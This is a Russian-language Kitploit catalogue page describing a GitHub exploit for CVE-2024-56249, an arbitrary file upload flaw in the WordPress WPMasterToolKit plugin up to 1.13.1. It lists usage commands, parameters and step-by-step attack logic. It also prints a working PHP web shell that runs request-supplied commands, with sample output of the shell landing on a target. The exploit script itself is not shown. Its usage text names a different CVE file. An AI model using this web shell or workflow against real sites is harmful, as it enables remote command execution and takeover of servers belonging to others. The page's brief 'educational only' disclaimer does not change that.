Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-56249 — WordPress WPMasterToolKit плагин <= 1.13.1 - Уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-56249
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit плагин <= 1.13.1 - Уязвимость произвольной загрузки файлов

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛠️ Эксплойт WordPress Master Toolkit (CVE-2024-56249)

🌟 Обзор

Этот скрипт эксплуатирует уязвимость произвольной загрузки файлов в плагине WPMasterToolKit для WordPress, позволяя злоумышленнику загрузить веб-шелл на сервер. Уязвимость существует в версиях плагина <= 1.13.1.

📝 Детали CVE

| Идентификатор CVE: | CVE-2024-56249 | | Опубликован: | 2025-01-02 | | Обновлён: | 2025-01-02 | | Описание: | Уязвимость неограниченной загрузки файлов опасного типа в Webdeclic WPMasterToolKit позволяет загружать веб-шелл на веб-сервер. | | CWE: | CWE-434: Неограниченная загрузка файлов опасного типа | | Оценка CVSS: | 9.1 (Критическая) | | Вектор CVSS: | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |

🚀 Использование

Для эксплуатации этой уязвимости используйте следующую команду:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 Параметры

  • -u / --url: Целевой URL WordPress (например, http://192.168.100.74:888/wordpress)
  • -un / --username: Имя администратора WordPress
  • -p / --password: Пароль администратора WordPress
  • -fp / --filepath: Путь для загрузки файла (по умолчанию: wp-content/uploads/2025/03)
  • -fn / --filename: Имя файла для загрузки (по умолчанию: shell.php)

🧩 Объяснение скрипта

🔍 1. Проверка уязвимости

Скрипт начинает с проверки целевого URL, чтобы убедиться, что он уязвим к CVE-2024-56249, путем проверки версии плагина WPMasterToolKit.

🔑 2. Аутентификация в WordPress

Затем он пытается войти в панель администратора WordPress, используя предоставленные учетные данные.

🛡️ 3. Извлечение токенов безопасности

После успешного входа скрипт извлекает необходимые токены безопасности (nonce и token), необходимые для загрузки файла.

📤 4. Развертывание полезной нагрузки

Он загружает указанный файл (например, веб-шелл) на целевой сервер, используя извлеченные токены.

✅ 5. Проверка загрузки

Наконец, скрипт проверяет, успешно ли загружен файл, проверяя его доступность через целевой URL.

📂 Примечание

Убедитесь, что файл шелла (например, shell.php) находится в том же каталоге, что и скрипт, перед его запуском. Это необходимо, чтобы скрипт успешно нашел и загрузил файл.

Пример файла шелла (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 Пример

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ Вывод

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ Использование скрипта

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Эксплойт Master Toolkit CVE-2024-56249 #от Nxploit | Khaled Alenazi

опции:
  -h, --help            показать это справочное сообщение и выйти
  -u, --url URL         Целевой URL WordPress (например, http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        Имя администратора WordPress
  -p, --password PASSWORD
                        Пароль администратора WordPress
  -fp, --filepath FILEPATH
                        Путь для загрузки файла (по умолчанию: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        Имя файла для загрузки (по умолчанию: shell.php)

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей. Используйте его на свой страх и риск. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.


Эксплойт-скрипт от Nxploit | Khaled Alenazi

Скачать инструмент